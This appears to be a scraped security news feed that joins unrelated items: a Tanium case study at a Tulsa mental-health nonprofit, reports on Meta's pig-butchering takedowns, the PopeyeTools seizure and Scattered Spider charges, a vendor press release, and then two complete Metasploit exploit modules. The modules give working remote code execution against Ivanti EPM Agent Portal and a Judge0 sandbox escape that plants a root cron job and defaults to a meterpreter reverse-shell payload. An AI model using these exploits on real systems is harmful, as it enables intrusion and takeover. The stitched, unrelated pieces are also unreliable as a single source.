Consolidating endpoint management boosts cybersecurity while keeping an Oklahoma-based nonprofit focused on community mental health.

Source: Everything Possible via Alamy Stock Photo

At the center of community care, a lifeline for mental health is making a lasting impact — strengthened by technology that ensures security without compromising compassion.

Mental-health center Family and Children's Services (FCS), based in Tulsa, Oklahoma, has helped transform the lives of members of its local community with programs to support their well-being, including child abuse and trauma support, as well as counseling for families and those suffering from substance abuse and addiction. The organization is more than 100 years old, serves more than 150,000 people each year, and offers services in more than 50 schools. It also more than doubled its staff in recent years and now has 1,500 employees who provide a variety of services, many that have moved online since the start of the pandemic.

These changes created a challenge for FCS CIO Brent Harris, who was responsible for protecting a rapidly growing organization with a sprawling IT environment and a boom in the number of endpoints in use. At the beginning of the pandemic lockdown in 2020, FCS distributed approximately 2,000 iPads and other devices to clients so that clinicians could offer teletherapy and telemedicine services. That brought the total number of devices that needed to be managed to around 3,500.

FCS was willing to spend on its core mission — serving the community's mental health needs — so most of its headcount growth was in its clinical staff. But Harris still had to manage with the same number of IT staff to keep costs down. Automation was key to solving this challenge.

"We needed a way to automate, to buy back time instead of trying to solve problems with manpower," Harris says. "We try to solve problems with technology."

**Piloting an Endpoint Management Platform**

The IT staff needed visibility into which software packages were on each device and whether the devices were being patched properly. The legacy system in use didn't give Harris the confidence that his team had that insight.

"Devices were on the network that we didn't see, and software was on someone's device that shouldn't be there that we didn't pick up on," Harris says. "Most of the things we found we found manually."

When FCS deployed Tanium as part of a pilot, the endpoint management platform immediately found devices that the legacy system had missed, Harris says. A tragic incident in the community shortly after illustrated the importance of having endpoint management technology with an accurate view of the environment.

"There was an event in our community where there was an active shooter, not at Family and Children's Services, but at a healthcare facility that a lot of us were familiar with," Harris says. "A lot of people in our agency had worked there in the past or had friends there, and so it really hit near home."

FCS needed a reliable employee notification system to ensure that the healthcare provider was prepared if a similar situation were to unfold. FCS was looking for a guarantee that everyone would receive information — such as employee notifications and software updates — pushed out by the system onto their individual devices.

"We would push it out to 1,000 endpoints and then get a report that said 796 of them received it, and we would have to manually go try to figure out where there were gaps," Harris says. "Tanium is far better at doing that. And in this case, you know, it's really life or death. If that scenario were to ever occur, we need to make sure that 100% of the devices on the network have the agent installed and it's running."

A trial run is an essential part of evaluating which technologies to purchase and deploy because it can help illuminate how well the solution meets the organization's needs, Harris says.

"We were able to do a pilot, and we were pretty convinced within a matter of days and weeks, not months, that this tool was going to be a very important part of our technology stack going forward," he adds.

**About the Author**

Jennifer Lawinski is a writer and editor with more than 20 years experience in media, covering a wide range of topics including business, news, culture, science, technology and cybersecurity. After earning a Master's degree in Journalism from Boston University, she started her career as a beat reporter for The Daily News of Newburyport. She has since written for a variety of publications including CNN, Fox News, Tech Target, CRN, CIO Insight, MSN News and Live Science. She lives in Brooklyn with her partner and two cats.

How a Mental Health Nonprofit Secures Endpoints for Compassionate Care

The company gave details for the first time on its approach to combating organized criminal networks behind the devastating scams.

Years into the escalating, multibillion-dollar global crisis of pig butchering scams, social media giant Meta released information for the first time on Thursday about its approach to combating the forced-labor compounds that fuel scam activity on its platforms and across the web.

The company says that for more than two years it has been focused on collaborating with global law enforcement and other tech companies to address the underlying problem of organized crime syndicates driving scam activity in Southeast Asia and the United Arab Emirates.

Meta says that so far this year it has done takedowns of more than 2 million accounts connected to scam compounds in Myanmar, Laos, Cambodia, the Philippines, and the UAE. The company has also been collaborating with external experts, including tech companies, NGOs, and coalitions working to counter online scams. As pig butchering scams generate significant revenue for criminals, though, and spread around the world, Meta notes that it has focused on working with law enforcement to directly track criminal syndicates.

“This is a highly adversarial space where we expect well-resourced and persistent criminal organizations to constantly evolve their tactics (both online and offline) in response to detection and enforcement to try and reconstitute across the internet,” a Meta spokesperson wrote in a statement. The company declined to share how many accounts it had removed prior to this year.

Longtime pig butchering researchers say that Meta has been slow to publicly and directly acknowledge the problem and the role its many platforms play in connecting scammers with potential victims. They emphasize that Meta’s services are far from the only platforms that scammers use to reach victims. But platforms like Facebook and Instagram are recognizable and trusted around the world, so it is inevitable, the researchers say, that scammers will gravitate to them. And Meta has warned its users broadly about investment and romance scams.

“I'm glad that Meta is finally starting to talk about this work, but in the research community, we feel like we've been trying to get their attention for a long time and collaborate with them and they often aren't engaging with us,” says Ronnie Tokazowski, a longtime pig butchering researcher and cofounder of the nonprofit Intelligence for Good.

Since roughly 2020, when the earliest pig butchering scams started to emerge, more than 200,000 people have been trafficked and held in compounds—mostly in Myanmar, Cambodia, and Laos—where they are forced to play the role of an online scammer. If they refuse, the criminals who own the scam compounds, which are typically connected to Chinese organized crime, often beat or torture them. People have been trafficked from more than 60 countries around the world—often after seeing online ads promising them jobs that are too good to be true.

The forced scammers are compelled to send thousands of online messages to potential victims around the world on a daily basis. They are tasked with building relationships, often with the lure of friendship or romance, and eventually persuade their victims to send them money as part of lucrative “investment opportunities.” Individually, victims have lost hundreds of thousands of dollars, while the pig butchering criminal enterprises have collectively conned people out of around $75 billion in recent years.

“These scams can start on dating apps, text message, email, social media, or messaging apps, then ultimately move to scammer-controlled accounts on crypto apps or scam websites masquerading as investment platforms,” Meta writes in its report. “In addition to disrupting scam centers, teams across Meta are constantly rolling out new product features to help protect people on our apps from known scam tactics at scale.”

Pig butchering scams drive toward financial theft, but they start with either one-to-one cold communication between scammers and potential victims or contact that originates from social media groups or other communal forums. For example, Gary Warner, director of intelligence at the cybersecurity firm DarkTower, says that he tracks thousands of Facebook groups dedicated to luring people into cryptocurrency investment scams as well as groups that purport to be community dating resources where scammers are lurking.

Online moderation of scammers is a difficult and longstanding issue for Big Tech. As is the case with many types of inauthentic content, some pig butchering activity can skirt tech company standards—even when they are doing a large number of account takedowns—because the content isn’t explicit enough to meet the criteria for removal.

"So much of what is on platform is clearly the prelude to pig butchering, but Meta says it ‘doesn't violate community standards,’” Warner says.

Meta emphasizes, though, that in addition to its account takedowns and monitoring for scam activity on its platforms, the company is focused on working to directly combat scam compounds using its policies around dangerous organizations and individuals, as well as wider safety policies.

However, the owners of scam compounds have been quick to adopt new technologies into their operations, partly to make their scamming more efficient, but likely also to evade law enforcement and technology clampdowns. In recent months, researchers have spotted pig butchering scammers using artificial intelligence tools, integrating deepfakes into their campaigns, and using malware to expand their capabilities. For example, scammers are now able to easily generate understandable content in many languages using AI translation tools for both the scripts and messages they send potential victims, as well as job advertisements luring prospective workers into scam compounds.

Meta says one recent scam compound that it took action against, which was targeting Japanese and Chinese speakers, followed a tip from OpenAI threat researchers who had spotted the criminal operation using ChatGPT to translate messages that could be used in pig butchering.

A “cluster” of accounts that all appeared to come from Cambodia were spotted translating and generating comments using ChatGPT, OpenAI spokesperson Liz Bourgeois tells WIRED. The comments generated using AI would be shared on social media and appeared to be linked to scam activity. Bourgeois says OpenAI banned the accounts and reported the social media activity to Meta.

Meta Finally Breaks Its Silence on Pig Butchering

The US Department of Justice has taken down PopeyeTools, a major online marketplace used by cybercriminals to sell…

The US Department of Justice has taken down PopeyeTools, a major online marketplace used by cybercriminals to sell stolen credit card information, hacking tools, and more. Learn about the three individuals charged in connection with this operation and how authorities are working to combat cybercrime.

The US Department of Justice (DoJ) has seized and shut down PopeyeTools, a notorious online marketplace that facilitated a wide range of illegal activities, and arrested three alleged administrators of the website.

PopeyeTools was operational since at least 2016, and functioned as a hub for cybercriminals, offering stolen financial data, tools for carrying out fraud, and even tutorials on how to commit these crimes.

The three men charged, Abdul Ghaffar (Pakistan), Abdul Sami (Pakistan), and Javed Mirza (Afghanistan), face up to 10 years in prison each for access device fraud charges levied against them. This move is part of the department’s “all-tools” approach to **combating cybercrime**.

The investigation was conducted by the FBI (Federal Bureau of Investigation). The DoJ’s actions, according to its **press release**, included seizing control of the PopeyeTools website itself, pressing criminal charges against the alleged administrators, and obtaining judicial authorization to seize $283,000 in cryptocurrency from an account controlled by Sami.

PopeyeTools, boasting the motto “We Believe in Quality Not Quantity,” built its reputation by allegedly offering validated stolen credit card information and other tools that facilitated fraudulent transactions. This “quality” came at a price, with individual sets of stolen payment card data and personal information selling for around $30 each.

Its Live Fullz section provided unauthorized payment card data and PII, while other sections included fresh bank logs, leads, scam pages, and guides. To attract members, PopeyeTools promised to refund or replace invalid credit cards and customers could check the validity of bank account, credit card, or debit card numbers offered through the website.

The website catered to a large audience, according to the Justice Department’s press release, selling stolen information to at least 227,000 individuals and generating over $1.7 million in revenue. PopeyeTools even offered customer support, including services to verify the validity of stolen financial data before purchase.

The dismantling of platforms like PopeyeTools is certainly a significant blow to cybercrime activities, demonstrating the DoJ’s commitment to disrupt criminal operations and protect the public from financial fraud.

1.  **WT1SHOP Cybercrime Market Seized**
2.  **Finnish Dark Web Marketplace PIILOPUOTI Seized**
3.  **NetWire Malware Site and Server Seized, Admin Arrested**
4.  **SSNDOB Cybercrime Marketplace Seized in Intl. Operation**
5.  **LockBit Ransomware Gang Domains Seized in Global Operation**

Operation Shipwrecked: US Seizes PopeyeTools Marketplace, Charges 3

Five alleged members of the notorious Scattered Spider hacking group have been charged with executing a sophisticated phishing…

Five alleged members of the notorious Scattered Spider hacking group have been charged with executing a sophisticated phishing scheme that netted them millions of dollars in stolen cryptocurrency and sensitive company data.

The United States govemnet has confirmed arresting and charging five individuals allegedly linked to the **Scattered Spider group** (aka 0ktapus and UNC3944). This notorious hacking collective is accused of masterminding a sophisticated phishing scheme that targeted employees across the United States.

The feds unsealed the charges against the five defendants on November 20, revealing a scheme that relied on mass text message campaigns. According to the US Justice Department’s **press release**, investigators identified four defendants the citizens of the United States and one from the United Kingdom.

*   **Joel Martin Evans (25) – United States**
*   **Noah Michael Urban (20) – United States**
*   **Evans Onyeaka Osiebo (20) – United States**
*   **Tyler Robert Buchanan (22) – United Kingdom**
*   **Ahmed Hossam Eldin Elbadawy (23) – United States**

As previously **reported by Hackread.com**, the gang targeted cryptocurrency users and investers along with the Federal Communications Commission (FCC) employees with phishing messages warning them about account deactivation and linked them to phishing websites that resembled legitimate ones.

The group directed recipients to provide confidential information, including login credentials, and sometimes employees were sent two-factor authentication requests sent to their mobile phones.

Once clicked, the links led to phony websites that mimicked real company login pages. Unsuspecting victims, believing they were accessing official company portals, unintentionally gave away their login credentials.

Using this stolen information, the Scattered Spider crew allegedly gained unauthorized access to corporate computer systems. Once inside, they stole a treasure trove of sensitive data, including intellectual property and proprietary information, as well as personal information from hundreds of thousands of individuals, according to United States Attorney Martin Estrada.

The group also, allegedly, used the stolen credentials they also gained unauthorized access to numerous individuals’ cryptocurrency accounts and wallets, stealing millions of dollars’ worth of virtual currency from victim company intrusions and leaked data sets.

It is worth noting that Scattered Spider was also behind the **cyberattack on MGM Resorts** International in September 2023 in which it collaborated with the ALPHV ransomware group, also known as BlackCat.

“The defendants allegedly preyed on unsuspecting victims in this phishing scheme and used their personal information as a gateway to steal millions in their cryptocurrency accounts,” stated the FBI’s Los Angeles Field Office’s Assistant Director in Charge, Akil Davis.

Authorities say the group operated from September 2021 to April 2023 and caused significant financial losses, not just to targeted companies but also to individual victims who lost their hard-earned cryptocurrency. It is worth noting that cryptocurrency custodian Fortress Trust lost $15 million in customer funds **due to a phishing attack** on third-party vendor, Retool, supposedly launched by the same group. 

If convicted, the defendants face a maximum sentence of 20 years in federal prison for a conspiracy to commit wire fraud case, up to five years for the conspiracy count, and a mandatory two-year consecutive sentence for aggravated identity theft.

**William Wright**, CEO of Closed Door Security, highlighted Scattered Spiders’ sophisticated tactics in targeting MGM Resorts, including tracking an employee on LinkedIn and exploiting IT helpdesk processes to reset a password. This was followed by an MFA fatigue attack, granting system access. Wright emphasized the need for organizations to test their networks and train employees to counter such advanced social engineering threats.

1.  **FBI Disrupts Chinese State-Backed Volt Typhoon’s KV Botnet**
2.  **Goldoon Botnet Hiy D-Link Devices, Exploits 9-Year-Old Flaw**
3.  **LockBit Ransomware Gang Domains Seized in Global Operation**
4.  **Operator of Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US**
5.  **4 Arrested as Operation Endgame Disrupts Ransomware Botnets**

US Charges 5 Suspected MGM Hackers from Scattered Spider Gang

MIAMI, Florida, 21st November 2024, CyberNewsWire

**MIAMI, Florida, November 21st, 2024, CyberNewsWire**

Halo Security, a leader in external attack surface management and penetration testing, has announced the launch of its new Slack® app, empowering cybersecurity teams to receive real-time alerts on newly discovered assets, vulnerabilities, and other essential security updates directly within the Slack collaboration software.

This new integration allows Halo Security’s customers to seamlessly incorporate important security notifications into their existing Slack workflows, improving response time and enhancing collaboration across security and IT teams. Previously, Halo Security offered Slack alerts through a Zapier integration, but this new, direct integration delivers a more streamlined experience, giving customers greater control with minimal configuration.

Halo Security’s platform offers comprehensive external attack surface management, encompassing asset discovery, risk and vulnerability assessment, and penetration testing in a single, user-friendly dashboard. Built by a team of experienced penetration testers, security engineers, and reformed hackers, Halo Security provides organizations with an attacker’s perspective to help identify and address vulnerabilities. With the new Slack integration, customers are notified as soon as new issues and vulnerabilities are detected, unknown assets or open ports are discovered, and new technologies appear on their websites, helping teams stay ahead of emerging threats without being overwhelmed by irrelevant alerts.

> “Organizations need real-time, customized alerts for emerging security threats, but too many notifications can lead to alert fatigue,” said Ben Tyler, CTO of Halo Security. “Our direct Slack integration is easily configurable, giving customers precise control over which alerts they receive and allowing them to focus on the most critical issues directly within their existing workflows.”

**How to Get Started with Halo Security’s Slack Integration**

Halo Security customers can activate the Slack app today directly from their accounts. New users interested in trying the Halo Security platform can sign up for a 7-day free trial at halosecurity.com.

**About Halo Security**

Halo Security is a comprehensive external attack surface management platform that provides asset discovery, risk assessment, and penetration testing in a single, easy-to-use dashboard. Founded by cybersecurity experts with backgrounds at McAfee, Intel, Kenna Security, OneLogin, and WhiteHat Security, Halo Security delivers a unique attacker-based approach to help organizations safeguard against potential threats. Users can learn more at halosecurity.com.

Slack is a registered trademark and service mark of Slack Technologies, Inc.

**Contact**

**VP of Marketing**  
**Nicholas Hemenway**  
**Halo Security**  
**\[email protected\]**

Halo Security Launches Slack Integration for Real-Time Alerts on New Assets and Vulnerabilities

As many as 2,000 Palo Alto Networks devices are estimated to have been compromised as part of a campaign abusing the newly disclosed security flaws that have come under active exploitation in the wild.
According to statistics shared by the Shadowserver Foundation, a majority of the infections have been reported in the U.S. (554) and India (461), followed by Thailand (80), Mexico (48), Indonesia

Warning: Over 2,000 Palo Alto Networks Devices Hacked in Ongoing Attack Campaign

The China-aligned advanced persistent threat (APT) actor known as Gelsemium has been observed using a new Linux backdoor dubbed WolfsBane as part of cyber attacks likely targeting East and Southeast Asia.
That's according to findings from cybersecurity firm ESET based on multiple Linux samples uploaded to the VirusTotal platform from Taiwan, the Philippines, and Singapore in March 2023.

Chinese APT Gelsemium Targets Linux Systems with New WolfsBane Backdoor

This Metasploit module leverages an unauthenticated remote command execution vulnerability in Ivanti's EPM Agent Portal where an RPC client can invoke a method which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM. This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.

    # This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-frameworkrequire 'rex/proto/ms_nrtp/client'class MetasploitModule < Msf::Exploit::Remote  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::Tcp  Rank = ExcellentRanking  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti EPM Agent Portal Command Execution',        'Description' => %q{          This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method          which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM.          This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.        },        'Author' => [          'James Horseman', # original poc          'Zach Hanley', # original poc          'Spencer McIntyre' # metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-28324'],          ['URL', 'https://forums.ivanti.com/s/article/SA-2023-06-06-CVE-2023-28324?language=en_US'],          ['URL', 'https://github.com/horizon3ai/CVE-2023-28324'],        ],        'Platform' => 'win',        'Arch' => ARCH_CMD,        'Targets' => [          [ 'Automatic', {} ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-06-07', # Ivanti article created date        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options([      Opt::RPORT(nil, true, 'The target port is not static. For more info, see this module\'s Verifications Steps in the docs.'),    ])    deregister_options('SSL')  end  def check    cwd = execute_command('echo %cd%', 0)    return CheckCode::Safe('Command execution failed.') unless cwd.to_s =~ /.:\\Windows\\System32/i    CheckCode::Vulnerable("Command execution test succeeded. Current working directory: #{cwd}")  rescue Rex::SocketError => e    CheckCode::Safe("MS-NRTP connection failed. #{e.class}: #{e.message}")  end  def exploit    execute_command(payload.raw)  end  def execute_command(command, result_delay = -1)    if @nrtp_client.nil?      @nrtp_client = client = IAgentPortal.new(        datastore['RHOST'],        datastore['RPORT'],        'LANDeskAgentPortal/LDSM',        context: { 'Msf' => framework, 'MsfExploit' => self }      )      client.connect      vprint_status('Connected to the remote end point')    else      client = @nrtp_client    end    client.do_request(command)    return nil unless result_delay >= 0    sleep result_delay    client.do_get_result  endendclass IAgentPortal < Rex::Proto::MsNrtp::Client  def recv_binary    Msf::Util::DotNetDeserialization::Types::SerializedStream.read(recv)  end  def send_recv_binary(serialized_stream)    send_binary(serialized_stream)    recv_binary  end  def do_request(shell_command)    ss_response = send_recv_binary(ss_request(shell_command))    method_return = ss_response.records.find { |record| record.record_type == Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodReturn] }    method_return.record_value.return_value.val.value  end  def do_get_result    ss_response = send_recv_binary(ss_get_result)    ass = ss_response.records.find { |record| record.record_type == Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleString] }    return nil unless ass    ass.record_value.members.first.record_value.string.value  end  private  def ss_get_result    Msf::Util::DotNetDeserialization::Types::SerializedStream.new({      records: [        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SerializedStreamHeader], record_value: { major_version: 1 } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodCall],          record_value: {            message_enum: {              no_context: 1,              args_inline: 1            },            method_name: 'GetResult',            type_name: 'LANDesk.AgentPortal.IAgentPortal, AgentPortal, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb',            args: [{ primitive_type_enum: Msf::Util::DotNetDeserialization::Enums::PrimitiveTypeEnum[:String], val: 'localhost' }]          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MessageEnd] }      ]    })  end  def ss_request(shell_command)    Msf::Util::DotNetDeserialization::Types::SerializedStream.new({      records: [        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SerializedStreamHeader], record_value: { root_id: 1, header_id: -1, major_version: 1, minor_version: 0 } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodCall],          record_value: {            message_enum: {              method_signature_in_array: 1,              no_context: 1,              args_in_array: 1            },            method_name: 'Request',            type_name: 'LANDesk.AgentPortal.IAgentPortal, AgentPortal, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb'          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleObject], record_value: { array_info: { obj_id: 1, member_count: 2 } } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 2 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 3 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleObject], record_value: { array_info: { obj_id: 2, member_count: 4 } } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 4, string: 'localhost' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 5 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 6, string: 'cmd.exe' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 7, string: "/c #{shell_command}" } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryArray], record_value: { obj_id: 3, binary_array_type_enum: 0, rank: 1, lengths: [4], type_enum: 3, additional_type_info: 'System.Type' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 9 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryLibrary], record_value: { library_id: 11, library_name: 'APCommon, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb' } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ClassWithMembersAndTypes],          record_value: {            class_info: { obj_id: 5, name: 'LANDesk.AgentPortal.IAgentPortalBase+ActionEnum', member_count: 1, member_names: ['value__'] },            member_type_info: { binary_type_enums: [0], additional_infos: [8] },            library_id: 11,            member_values: [1]          }        },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SystemClassWithMembersAndTypes],          record_value: {            class_info: { obj_id: 8, name: 'System.UnitySerializationHolder', member_count: 3, member_names: ['Data', 'UnityType', 'AssemblyName'] },            member_type_info: { binary_type_enums: [1, 0, 1], additional_infos: [8] },            member_values: [{ record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 12, string: 'System.String' } }, 4, { record_type: 6, record_value: { obj_id: 13, string: 'mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' } }]          }        },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ClassWithId],          record_value: {            obj_id: 9,            metadata_id: 8,            member_values: [              { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 14, string: 'LANDesk.AgentPortal.IAgentPortalBase+ActionEnum' } },              4,              { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 15, string: 'APCommon, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb' } }            ]          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MessageEnd], record_value: {} }      ]    })  endend

Ivanti EPM Agent Portal Command Execution

Judge0 does not account for symlinks placed inside the sandbox directory, which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Judge0 sandbox escape',        'Description' => %q{          Judge0 does not account for symlinks placed inside the sandbox directory,          which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.        },        'Author' => [          'Tanto Security',    # Vulnerability discovery          'Takahiro Yokoyama'  # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-28185'],          ['CVE', '2024-28189'],          ['URL', 'https://tantosec.com/blog/judge0/'],        ],        'Payload' => {          'DisableNops' => true,          # https://github.com/judge0/judge0/blob/ad66f77b131dbbebf2b9ff8083dca9a68680b3e5/app/jobs/isolate_job.rb#L199          'BadChars' => '$&;<>|`'        },        'DefaultOptions' => {          'FETCH_DELETE' => false,          'WfsDelay' => 75        },        'Platform' => %w[linux],        'Targets' => [          [            'Linux Command', {              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET'              }            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2024-03-04',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        Opt::RPORT(2358),      ]    )  end  def compile_language_ids    @languages = []    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'languages')    })    return unless res&.code == 200    languages = JSON.parse(res.body)    bash = languages.detect { |row| row['name'].include?('Bash') }    return unless bash    @bash_id = bash['id']    languages.each do |language|      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path, "languages/#{language['id']}")      })      lang_info = JSON.parse(res.body)      @languages << language if res&.code == 200 && lang_info['compile_cmd'] && !lang_info['is_archived']    end    return if @languages.empty?    @languages  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'version')    })    return Exploit::CheckCode::Unknown unless res&.code == 200    version = Rex::Version.new(res.body)    return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable") unless version <= Rex::Version.new('1.13.0')    print_status("Version #{version} detected, which is vulnerable")    return Exploit::CheckCode::Appears if compile_language_ids    Exploit::CheckCode::Unknown  end  def exploit    # Setting the `FETCH_DELETE` option seems to break the payload execution.    # `register_files_for_cleanup` will be used later to cleanup.    fail_with(Failure::BadConfig, 'FETCH_DELETE must be set to false') if datastore['FETCH_DELETE']    execute_command(payload.encoded)  end  def execute_command(cmd, _opts = {})    compile_language_ids if @languages.nil?    if @languages.empty? && !datastore['ForceExploit']      fail_with(Failure::Unknown, 'Failed to get compile language ids')    end    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'submissions?wait=true'),      'vars_post' => {        'source_code' => 'mv run runbak; ln -s /bin/rm run',        # if cannot get bash id but set ForceExploit to true, use 46        'language_id' => @bash_id || 46 # Bash      }    })    cron_path = '/etc/cron.d/' + rand_text_alpha(8)    print_status("Writing cron job to #{cron_path}")    # use random compile language ids    # if cannot get compile language ids but set ForceExploit to true, use 73 (Rust)    language = !@languages.empty? ? @languages.sample : { id: 73, name: 'Rust' }    print_status("Use language: #{language['id']}, #{language['name']}")    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'submissions?wait=true'),      'vars_post' => {        'source_code' => "#test #{rand_text_alphanumeric(5..10)}",        'language_id' => language['id'],        'compiler_options' => "--version\nln -s /bin/rm ./run\n#",        'command_line_arguments' => "x\n"\                                    "cp /bin/rm #{cron_path}\n"\                                    "cp /usr/bin/unlink /bin/rm\n"\                                    "sed -i 's/.*/#/g' #{cron_path}\n"\                                    "sed -i \"2i #{cron_file(cmd)}\" #{cron_path}\n"\                                    "echo 'ok'\n" # not used      }    })    register_files_for_cleanup(cron_path, "/root/#{datastore['FETCH_FILENAME']}")  end  def cron_file(command)    cron_file = 'SHELL=/bin/sh'    cron_file << '\\n'    cron_file << 'PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin'    cron_file << '\\n'    cron_file << "* * * * * root #{command}"    cron_file << '\\n'    cron_file  endend

Judge0 Sandbox Escape

Wireshark is a GTK+-based network protocol analyzer that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and Win32 and to give Wireshark features that are missing from closed-source sniffers. This is the source code release.

Latest News